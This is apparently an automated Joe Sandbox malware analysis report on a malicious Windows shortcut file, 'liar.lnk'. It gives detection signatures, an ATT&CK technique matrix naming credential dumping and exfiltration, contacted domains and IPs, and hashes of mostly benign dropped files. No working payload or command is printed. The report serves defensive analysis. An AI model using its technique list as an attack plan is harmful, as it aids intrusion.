Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Resources\Fonts\SegMVR2.ttf VolumeInformationJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Resources\Fonts\SegMVR2.ttf VolumeInformationJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Resources\Fonts\SegMVR2.ttf VolumeInformationJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeQueries volume information: C:\Windows\Fonts\segoeuil.ttf VolumeInformationJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeQueries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformationJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneVideo_8wekyb3d8bbwe\LocalState\backstack.json VolumeInformationJump to behavior
Source: Amcache.hve.1.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.1.drBinary or memory string: msmpeng.exe
Source: Amcache.hve.1.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.1.drBinary or memory string: MsMpEng.exe
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Command and Scripting Interpreter
2
Registry Run Keys / Startup Folder
11
Process Injection
1
Masquerading
OS Credential Dumping21
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
2
Registry Run Keys / Startup Folder
1
Virtualization/Sandbox Evasion
LSASS Memory1
Process Discovery
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
DLL Side-Loading
11
Process Injection
Security Account Manager1
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information
NTDS2
File and Directory Discovery
Distributed Component Object ModelInput Capture3
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA Secrets21
System Information Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1624328 Sample: liar.lnk Startdate: 26/02/2025 Architecture: WINDOWS Score: 64 16 star-azurefd-prod.trafficmanager.net 2->16 18 shed.dual-low.s-part-0039.t-0009.t-msedge.net 2->18 20 5 other IPs or domains 2->20 24 Windows shortcut file (LNK) starts blacklisted processes 2->24 26 Multi AV Scanner detection for submitted file 2->26 28 Windows shortcut file (LNK) contains suspicious command line arguments 2->28 30 Joe Sandbox ML detected suspicious sample 2->30 7 cmd.exe 4 2->7         started        9 Video.UI.exe 40 41 2->9         started        signatures3 process4 dnsIp5 12 conhost.exe 1 7->12         started        14 findstr.exe 1 7->14         started        22 e87.dspb.akamaiedge.net 23.219.148.9, 443, 49750 VTRBANDAANCHASACL United States 9->22 process6

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
liar.lnk24%VirustotalBrowse
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://login.windows.localhttps://login.windows.local/0%Avira URL Cloudsafe
https://xsts.auth.xboxlive.comB0%Avira URL Cloudsafe
https://login.windows.netate0%Avira URL Cloudsafe

Download Network PCAP: filteredfull

NameIPActiveMaliciousAntivirus DetectionReputation
s-part-0039.t-0009.t-msedge.net
13.107.246.67
truefalse
    high
    e87.dspb.akamaiedge.net
    23.219.148.9
    truefalse
      high
      settings-ssl.xboxlive.com
      unknown
      unknownfalse
        high
        NameMaliciousAntivirus DetectionReputation
        https://settings-ssl.xboxlive.com/XBLWinClient/v10_video/configuration.xmlfalse
          high
          NameSourceMaliciousAntivirus DetectionReputation
          https://login.windows.localVideo.UI.exe, 00000008.00000002.1503046462.000001D1E2C00000.00000004.00000020.00020000.00000000.sdmpfalse
            high
            https://login.windows.netVideo.UI.exe, 00000008.00000002.1503046462.000001D1E2C00000.00000004.00000020.00020000.00000000.sdmpfalse
              high
              https://login.windows.net/Video.UI.exe, 00000008.00000002.1503046462.000001D1E2C00000.00000004.00000020.00020000.00000000.sdmpfalse
                high
                http://schemas.xmlsoap.org/soap/httpVideo.UI.exe, 00000008.00000003.1392605393.000001D1E2D13000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  https://settings-ssl.xboxlive.comVideo.UI.exe, 00000008.00000003.1483620858.000001D1E1D4B000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    https://login.windows.netateVideo.UI.exe, 00000008.00000002.1503046462.000001D1E2C00000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://wns.windows.com/DRM_IndividualizedVersionVideo.UI.exe, 00000008.00000002.1501752583.000001D1E1E2F000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      http://dmd-ca-beta2/CertEnroll/dmd-ca-beta2_Microsoft%20Digital%20Media%20Authority%202005.crt0dVideo.UI.exe, 00000008.00000003.1392369675.000001D1E515B000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://android.notify.windows.com/iOSVideo.UI.exe, 00000008.00000002.1501939017.000001D1E1E8A000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://xsts.auth.xboxlive.comVideo.UI.exe, 00000008.00000002.1503046462.000001D1E2C00000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://xsts.auth.xboxlive.comBVideo.UI.exe, 00000008.00000003.1483620858.000001D1E1D4B000.00000004.00000020.00020000.00000000.sdmp, Video.UI.exe, 00000008.00000002.1501235603.000001D1E1D71000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppVideo.UI.exe, 00000008.00000002.1500766463.000001D1E1C57000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://login.windows.localhttps://login.windows.local/Video.UI.exe, 00000008.00000002.1503046462.000001D1E2C00000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://upx.sf.netAmcache.hve.1.drfalse
                                high
                                https://settings-ssl.xboxlive.com/Video.UI.exe, 00000008.00000003.1483620858.000001D1E1D4B000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://settings-ssl.xboxlive.com/XBLWinClient/v10_video/configuration.xmlACVideo.UI.exe, 00000008.00000003.1483620858.000001D1E1CFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    http://json-schema.org/draft-04/schemaVideo.UI.exe, 00000008.00000002.1494912670.000001D1D483E000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://musicimage.xboxlive.comtBeforeRS2ent/v10_video/configuration.xmlVideo.UI.exe, 00000008.00000003.1483620858.000001D1E1CFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        http://dmd-ca-beta2/CertEnroll/Microsoft%20Digital%20Media%20Authority%202005.crlVideo.UI.exe, 00000008.00000003.1392369675.000001D1E515B000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://xsts.auth.xboxlive.com/Video.UI.exe, 00000008.00000002.1503046462.000001D1E2C00000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs
                                            IPDomainCountryFlagASNASN NameMalicious
                                            23.219.148.9
                                            e87.dspb.akamaiedge.netUnited States
                                            22047VTRBANDAANCHASACLfalse
                                            Joe Sandbox version:42.0.0 Malachite
                                            Analysis ID:1624328
                                            Start date and time:2025-02-26 07:58:37 +01:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 4m 40s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:21
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:liar.lnk
                                            Detection:MAL
                                            Classification:mal64.winLNK@8/20@1/1
                                            EGA Information:Failed
                                            HCA Information:Failed
                                            Cookbook Comments:
                                            • Found application associated with file extension: .lnk
                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, SIHClient.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                            • Excluded IPs from analysis (whitelisted): 2.19.106.8, 23.60.203.209, 52.149.20.212, 13.107.253.72, 13.107.246.67, 204.79.197.200
                                            • Excluded domains from analysis (whitelisted): e11290.dspg.akamaiedge.net, www.bing.com, fs.microsoft.com, go.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, go.microsoft.com.edgekey.net, activation2.playready.microsoft.com, traf-activation-global.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                            • Execution Graph export aborted for target Video.UI.exe, PID 6968 because it is empty
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report size getting too big, too many NtOpenKey calls found.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            No simulations
                                            No context
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            s-part-0039.t-0009.t-msedge.netZoomWorkplace.ClientSetup.exeGet hashmaliciousScreenConnect ToolBrowse
                                            • 13.107.246.67
                                            https://login.case.edu/cas/login?gateway=true&service=https%3A%2F%2Fassets-usa.mkt.dynamics.com/073116b7-d9ed-ef11-933d-6045bd027c35/digitalassets/standaloneforms/f762be82-c9f2-ef11-9342-000d3a59dfbeGet hashmaliciousInvisible JSBrowse
                                            • 13.107.246.67
                                            BC Indo - New Order 2025.xlsGet hashmaliciousUnknownBrowse
                                            • 13.107.246.67
                                            http://nest%73%70%65%61%6b%2e%63%6f%6dGet hashmaliciousHTMLPhisherBrowse
                                            • 13.107.246.67
                                            Consulta de compra.xla.xlsxGet hashmaliciousUnknownBrowse
                                            • 13.107.246.67
                                            Documents .xlsGet hashmaliciousUnknownBrowse
                                            • 13.107.246.67
                                            https://56a1a721.8ce395d20e6a84048459b0f5.workers.dev/Get hashmaliciousHTMLPhisherBrowse
                                            • 13.107.246.67
                                            BYXd8qZ8Ul.msiGet hashmaliciousUnknownBrowse
                                            • 13.107.246.67
                                            document.xlsGet hashmaliciousUnknownBrowse
                                            • 13.107.246.67
                                            e87.dspb.akamaiedge.net2024-03-12 22.15.37.jpgGet hashmaliciousUnknownBrowse
                                            • 95.101.148.7
                                            c3f8604d.msgGet hashmaliciousHTMLPhisherBrowse
                                            • 2.23.244.9
                                            croc.mp4Get hashmaliciousUnknownBrowse
                                            • 2.23.244.9
                                            LEC3KQZZqZGet hashmaliciousUnknownBrowse
                                            • 2.23.244.9
                                            kangarooing.m4aGet hashmaliciousUnknownBrowse
                                            • 104.119.108.11
                                            Ohio.mp4Get hashmaliciousUnknownBrowse
                                            • 95.101.148.7
                                            Ohio.mp4Get hashmaliciousUnknownBrowse
                                            • 95.101.148.7
                                            Ohio.mp4Get hashmaliciousUnknownBrowse
                                            • 95.101.148.7
                                            Zingmantoku[1].mp4Get hashmaliciousUnknownBrowse
                                            • 95.101.148.7
                                            Mealse.exeGet hashmaliciousUnknownBrowse
                                            • 2.23.244.9
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            VTRBANDAANCHASACLsplmpsl.elfGet hashmaliciousUnknownBrowse
                                            • 200.86.134.252
                                            res.x86.elfGet hashmaliciousUnknownBrowse
                                            • 186.156.116.0
                                            https://steamcommunity-cash.com/gift-card/638641573Get hashmaliciousUnknownBrowse
                                            • 23.219.149.221
                                            http://sso-ndax-io-authh.webflow.io/Get hashmaliciousHTMLPhisherBrowse
                                            • 23.219.148.49
                                            https://www.rrpostoffice.com/routesGet hashmaliciousUnknownBrowse
                                            • 23.219.148.111
                                            https://www.rrpostoffice.com/westGet hashmaliciousUnknownBrowse
                                            • 23.219.148.111
                                            x86.elfGet hashmaliciousMiraiBrowse
                                            • 190.47.95.235
                                            https://auth.gy/crxLW-pr7WLjb1OTXg?/facebook_secure_account?id=759347502378427672987349826578129038123807394Get hashmaliciousUnknownBrowse
                                            • 23.219.148.49
                                            https://steamcommunttiy.com/activation=Tvc2Fh12mw1Get hashmaliciousUnknownBrowse
                                            • 23.219.149.221
                                            https://sltreanmcommnunlty.com/nurka/kisloy/efotrGet hashmaliciousUnknownBrowse
                                            • 23.219.149.221
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            6271f898ce5be7dd52b0fc260d0662b3SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.1821.22378.xlsxGet hashmaliciousUnknownBrowse
                                            • 23.219.148.9
                                            SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.1821.22378.xlsxGet hashmaliciousUnknownBrowse
                                            • 23.219.148.9
                                            Message.emlGet hashmaliciousUnknownBrowse
                                            • 23.219.148.9
                                            SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.32445.25122.xlsxGet hashmaliciousUnknownBrowse
                                            • 23.219.148.9
                                            Purchase Order PO-C1J24023-0624-01-0.xlsGet hashmaliciousUnknownBrowse
                                            • 23.219.148.9
                                            Purchase Order PO-C1J24023-0624-01-0.xlsGet hashmaliciousUnknownBrowse
                                            • 23.219.148.9
                                            BC Indo - New Order.xlsGet hashmaliciousUnknownBrowse
                                            • 23.219.148.9
                                            BC Indo - New Order 2025.xlsGet hashmaliciousUnknownBrowse
                                            • 23.219.148.9
                                            Inv No.248700.xlsGet hashmaliciousUnknownBrowse
                                            • 23.219.148.9
                                            PO-KA29822025-25 .xla.xlsxGet hashmaliciousUnknownBrowse
                                            • 23.219.148.9
                                            No context
                                            Process:C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exe
                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1520
                                            Entropy (8bit):5.0183726539703795
                                            Encrypted:false
                                            SSDEEP:24:2dzI4+uTOBzpoD2h9f0lM702X9bh9q02Xiwqh9U02XiSbh9Uydq2X4h9Uy72Xyh2:cK88z2D2ff97DtbfqDtqfUD9bfUywBfW
                                            MD5:E72FC6D9DAF66E2D8BC9FE37BE8CE4D8
                                            SHA1:667F95190910D5841E4531330001423CBB8E2030
                                            SHA-256:B5CCAFA927AF87CEA7E85A2D197C2E841E557B87900665C12FA6F8059B8B9356
                                            SHA-512:5D56979DBDB586601570DB6AEE666EA1DF489F3EB25285DEDC4A216834955E590158058D6B0C23D084C6C059AD91CF7B7FC32436E572693A96527F3D6E14160C
                                            Malicious:false
                                            Reputation:moderate, very likely benign file
                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<clientConfiguration xmlns="http://schemas.microsoft.com/XblWinClient/2012/03" version="1">.. <targetedClient>XblWinClient</targetedClient > .. <rights>Copyright (c) Microsoft Corporation. All rights reserved.</rights>.. <configuration name="Playback" minBuild="16122.1018">.. <property name="UseAdaptiveMediaSourcePercent" value="50" type="int32"/>.. <property name="UseDashContentForMBRSourcePercent" value="100" type="int32"/>.. </configuration>.. <configuration name="Playback" minBuild="16122.1018" maxBuild="17032.1033">.. <property name="UseDashContentForMBRSourcePercentBeforeRS2" value="0" type="int32"/>.. </configuration>.. <configuration name="Playback" minBuild="17032.1034">.. <property name="UseDashContentForMBRSourcePercentBeforeRS2" value="100" type="int32"/>.. </configuration>.. <configuration name="Groveler" minBuild="17063.0" maxBuild="17082.9999">..
                                            Process:C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exe
                                            File Type:RAGE Package Format (RPF),
                                            Category:dropped
                                            Size (bytes):5113
                                            Entropy (8bit):6.056055434898838
                                            Encrypted:false
                                            SSDEEP:96:Lhe9pC5u424jYmmHxR54BNMYVUXiksiGAshzcEeLKY/v3QZMhMKUVeyBX:9ejC5u424kmo8LQifiDa0aX
                                            MD5:2DB099C348C53E33ACC249ED3162285E
                                            SHA1:41D09EEBBEAABC4E79774B09CFF20FFB19CBF905
                                            SHA-256:3D33F8EC66CC099C23B27CA4343EE092E01E7DC4AEDF2589DAFA1BD089B71058
                                            SHA-512:9C141AC0F28A61041E381C28382B4D8AE2C326E87514756DAF4414E98D7C17743A14F420E4A172B2E6DD2E41DDEA6F742D42AE9AF8AA84E94CBFF19BFDC92B12
                                            Malicious:false
                                            Reputation:low
                                            Preview:PRKF...................................,........".P...,q........P..A.k..%.%........|.......@...|...@.B.<..T.a%/P...L.!h.........XD.5..j.5O...x.....p...$e...5.... M..Zi....#8t..I.Y6....c....Wh.(X.......<.....`..........V,.Q..r?....5{............................................@GV.Q%...N.....xmP..Urd. .?....Z.....x...(.Kbq.5I;......}(.7............ Ao.\.!...P.Gdd.5.7y,.u.9.....i.i.%.*1.I....~.e...................@r...........W...'.m...[.....d....vD..G.~.y.4.h........}Z............. ..S..*.!8..c..oyN>..@..ab../... ..-F..q....M...................@...|...@.B.<..T.a%/P...L.!h.........XD.5..j.5O...x.....p.............A49...3..... Tb.GS..iE./y...<[.}.....Ogo..x.3OX.....o...D...C..b..R.F..%A5J"4...........P.......@CHAI.......@........CERT...................X... gmRX.h.n.e^;............L..4R........J...........H28..............................(...<.....................................................r...........W...'.m...[.....d....vD..G.~.y.4.h.......
                                            Process:C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):528384
                                            Entropy (8bit):0.013001348189374193
                                            Encrypted:false
                                            SSDEEP:12:2Jdmkc+ZoPtV0wfDXECEedy7l33cv8jv0oCiCo3kc+Jin0:2JdmuiJfltdKcCMoCqZn0
                                            MD5:62F13D55B7A1F75E789EF2BDD94BFF26
                                            SHA1:0333794E9F061B458BD95B676B444137681CBAFF
                                            SHA-256:07C762565ACCD493BD69E2E3DC1AA8A48288301944785EE89B4EA5EC2D610535
                                            SHA-512:EF559C93E45BDEE087526B9E82C5D19D08713D38A34755D5E57CC267D66222667985CFA65EF416D9111B11661C67CD3D16F9CEF7EEFF048C05F0BB328832DE65
                                            Malicious:false
                                            Reputation:low
                                            Preview:........A.s..%-.i...0............;......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exe
                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0x9de7a5b4, page size 8192, DirtyShutdown, Windows version 10.0
                                            Category:dropped
                                            Size (bytes):3670016
                                            Entropy (8bit):0.2268281062578643
                                            Encrypted:false
                                            SSDEEP:1536:zSh2YKY8kA9nbggTC0/k63bBu7fhWxFW6GSh2BKY8ksyDFqfObgTC0/k63bBu7fv:z6jLCQ6G6WL/
                                            MD5:3719D8C2677A2995BC1591EA79F17687
                                            SHA1:1B487DD7D2F66A230530B46D250EE8D9D6AC83FA
                                            SHA-256:E6EB7BC528869744DA26319E89A2F35E2A7BA6013207463C9A7DE0768DD016E8
                                            SHA-512:BFD997C9EB1051C36515F08AE467377F3CBEA0927BA40BCDCC59F19DC01E83B06DF7203220CBAF1794AFF0088F701533FAE9D336530B8B7BE5A946F9230A7667
                                            Malicious:false
                                            Reputation:low
                                            Preview:..... .......-........).#.;...}.......................................;...}-.h..............................<.;...}..........................................................................................................eJ........... ...................................................................................................... ........;...}...............................................................................................................................................................................................;...}....................................%.;...}.;....................;...}..........................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):16384
                                            Entropy (8bit):0.04487143845414837
                                            Encrypted:false
                                            SSDEEP:3:+mlXf7u8vn//Pl8+lazeDnYu/lIDYolqll:bXTdn//PG+lay7vule
                                            MD5:CAB19EFE5B55D3E3B526E6D81770867D
                                            SHA1:D8CD876FF8BBF2307BE3B2CFCB09A3194EC44090
                                            SHA-256:711C6BEE048FAA5E8F45AE372A90499B342B361C3DBD83AD27EB5E2ABA989220
                                            SHA-512:8FD45DF328258F0CCE1200DB148D8AB09C1F9C0FC7F014FB17167C6BF043F76D32A72EF53ED17803E07F00D5B730012B50B545213D698B85C84A42365E181419
                                            Malicious:false
                                            Reputation:low
                                            Preview:..>......................................;...}...;...}...................;...}...............;...}m.....................;...}..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):8192
                                            Entropy (8bit):0.6154979661209247
                                            Encrypted:false
                                            SSDEEP:12:HWwUI1+uJ1qwUI1+uJ1GQelBsLWwUI1+uJ1qwUI1+uJ1GQelBs:HWwUO/qwUO/GEWwUO/qwUO/G
                                            MD5:E3EC32ABBA5DE5DC32DF5187F6DEA03B
                                            SHA1:8CDE447A0BE40374EBED8E3222A0C48ACC338983
                                            SHA-256:E8C50406542FA82426E5DAD1B39E73F9127CDF54521987A52E6B2B53CDD9F4F3
                                            SHA-512:07828970D259E74D2538A04CA6134C610DC2A858BD0B7D595BF8C914F3153E6FA677917474807863430B949667B55B9CBFB1BFC43184B296B9A58E74047B9626
                                            Malicious:false
                                            Reputation:low
                                            Preview:.......................<.;...}..................C:\Users\user\AppData\Local\Packages\Microsoft.ZuneVideo_8wekyb3d8bbwe\LocalState\Database\anonymous\................................................................................................................................................................C:\Users\user\AppData\Local\Packages\Microsoft.ZuneVideo_8wekyb3d8bbwe\LocalState\Database\anonymous\.................................................................................................................................................................0u..,.....................5w.................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):2097152
                                            Entropy (8bit):0.6847858134228472
                                            Encrypted:false
                                            SSDEEP:1536:Lzc3R1dPEBmHlbDulvu2Sa+ciy+zWM8DcPBiNwIifO4qJi/G1518AZ5yeh0G32fA:Lzc3RzDHBOT1J9EYANqnmg
                                            MD5:88712BD8C6D806FEFE6227F2D04ADB1C
                                            SHA1:4F0C4CE9D8CE6F836A3069366AD5735AE49ED7D5
                                            SHA-256:750C23A545127152E5A63C809076BFE376E0C907448A36CE13124E88F142C988
                                            SHA-512:3BBF6F206D05147F4AEB27CD73B530C3A2BD1E3B6378D87391B9E875355D2A12E6955233F32B4095123774411CB46A5B89D75924023DAA57D00F06A7AC3B7A2A
                                            Malicious:false
                                            Preview:(.(............ .;...}.........................<.;...}..................C:\Users\user\AppData\Local\Packages\Microsoft.ZuneVideo_8wekyb3d8bbwe\LocalState\Database\anonymous\................................................................................................................................................................C:\Users\user\AppData\Local\Packages\Microsoft.ZuneVideo_8wekyb3d8bbwe\LocalState\Database\anonymous\.................................................................................................................................................................0u..,.....................5w.......................................#.................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):2097152
                                            Entropy (8bit):0.0
                                            Encrypted:false
                                            SSDEEP:3::
                                            MD5:B2D1236C286A3C0704224FE4105ECA49
                                            SHA1:7D76D48D64D7AC5411D714A4BB83F37E3E5B8DF6
                                            SHA-256:5647F05EC18958947D32874EEB788FA396A05D0BAB7C1B71F112CEB7E9B31EEE
                                            SHA-512:731859029215873FDAC1C9F2F8BD25A334ABF0F3A9E1B057CF2CACC2826D86B0C26A3FA920A936421401C0471F38857CB53BA905489EA46B185209FDFF65B3B6
                                            Malicious:false
                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):2097152
                                            Entropy (8bit):0.0
                                            Encrypted:false
                                            SSDEEP:3::
                                            MD5:B2D1236C286A3C0704224FE4105ECA49
                                            SHA1:7D76D48D64D7AC5411D714A4BB83F37E3E5B8DF6
                                            SHA-256:5647F05EC18958947D32874EEB788FA396A05D0BAB7C1B71F112CEB7E9B31EEE
                                            SHA-512:731859029215873FDAC1C9F2F8BD25A334ABF0F3A9E1B057CF2CACC2826D86B0C26A3FA920A936421401C0471F38857CB53BA905489EA46B185209FDFF65B3B6
                                            Malicious:false
                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):2097152
                                            Entropy (8bit):0.0
                                            Encrypted:false
                                            SSDEEP:3::
                                            MD5:B2D1236C286A3C0704224FE4105ECA49
                                            SHA1:7D76D48D64D7AC5411D714A4BB83F37E3E5B8DF6
                                            SHA-256:5647F05EC18958947D32874EEB788FA396A05D0BAB7C1B71F112CEB7E9B31EEE
                                            SHA-512:731859029215873FDAC1C9F2F8BD25A334ABF0F3A9E1B057CF2CACC2826D86B0C26A3FA920A936421401C0471F38857CB53BA905489EA46B185209FDFF65B3B6
                                            Malicious:false
                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exe
                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0x0b8a093f, page size 8192, JustCreated, Windows version 0.0
                                            Category:dropped
                                            Size (bytes):262144
                                            Entropy (8bit):0.02012892582409512
                                            Encrypted:false
                                            SSDEEP:12:jy0TnJy0Tn2zbsXDABAM+afrNQnoAIrlKVsaY5uhkrYaqaJdGlu:jlJl2PszA9+MyjVsfUh7Pu
                                            MD5:427E91C7932B7CF8EC6C21F7871E60ED
                                            SHA1:12CE8F4598CB875E862C60E3AEC601F4694C58B8
                                            SHA-256:EBF4FF38CE5A9E71BC0012A4A5D8475D1DEF074D0D341179877CA65E0FCAFC84
                                            SHA-512:B0C965CF5C33533B84F60CF9505EE993A308F64C805429EC2CED3B7EDFEEBD9E96D109ABC46E849D28D6701A837EB2B208DDFEDE1C928377234BD62E069EB0DC
                                            Malicious:false
                                            Preview:...?... .......@.........3.;...}m.......................................................................................................................................................................................................... ...................................................................................................... ......................................................................................................................................................................................................................................................<.;...}m3....................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):264
